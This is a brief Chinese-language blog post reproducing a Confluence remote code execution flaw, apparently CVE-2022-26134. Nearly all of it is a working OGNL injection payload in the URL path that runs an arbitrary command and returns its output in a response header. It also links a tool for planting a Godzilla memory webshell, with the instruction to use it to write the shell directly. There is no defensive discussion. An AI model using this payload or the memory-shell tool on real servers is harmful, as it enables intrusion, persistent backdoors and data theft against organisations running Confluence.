漏洞复现-confluence远程代码执行

发表于2022-06-16|更新于2022-06-16

|字数总计:56|阅读时长:1分钟|阅读量:

/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("COMMAND").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/

https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL

使用此工具直接写入内存马

文章作者: Hyyrent

文章链接: https://pizz33.github.io/posts/e8c8e83fcc75/

漏洞复现

相关推荐

2023-03-29

漏洞复现-Minio信息泄露漏洞（CVE-2023-28432）

2022-05-10

漏洞复现-CVE-2022-1388 F5 BIG-IP RCE

2023-03-17

漏洞复现-Nacos身份认证绕过

2022-03-27

漏洞复现-Spring Cloud Function SpEL表达式注入

2022-04-01

漏洞复现-Spring core rce排坑小结